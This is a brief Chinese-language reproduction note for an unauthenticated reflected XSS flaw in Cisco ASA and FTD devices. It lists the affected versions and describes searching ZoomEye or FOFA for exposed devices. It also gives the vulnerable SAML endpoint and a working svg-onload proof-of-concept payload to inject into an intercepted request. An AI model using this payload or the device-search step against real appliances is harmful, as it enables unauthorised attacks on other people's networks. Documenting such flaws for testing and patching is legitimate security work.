一、前言
前段時間碰到了該漏洞,記錄一下!
二、漏洞介紹
該漏洞爲思科ASA設備和FTD設備的未授權反射型XSS漏洞,影響版本如下:
-
Cisco ASA Software 9.6
-
Cisco ASA Software 9.7
-
Cisco ASA Software 9.8
-
Cisco ASA Software 9.9
-
Cisco ASA Software 9.10
-
Cisco ASA Software 9.12
-
Cisco ASA Software 9.13
-
Cisco ASA Software 9.14
-
Cisco ASA Software 9.15
-
Cisco FTD Software 6.2.2
-
Cisco FTD Software 6.2.3
-
Cisco FTD Software 6.3.0
-
Cisco FTD Software 6.4.0
-
Cisco FTD Software 6.5.0
-
Cisco FTD Software 6.6.0
-
Cisco FTD Software 6.7.0
三、漏洞復現
首先利用zoomeye
或者fofa
等搜索設備,搜索關鍵詞爲/+CSCOE+/
,該漏洞出現在/+CSCOE+/saml/sp/acs
接口處,POC
爲SAMLResponse="><svg/onload=alert('XSS')>
,訪問設備後修改包爲POC
,如下圖所示:
然後forward
即可,如下圖所示: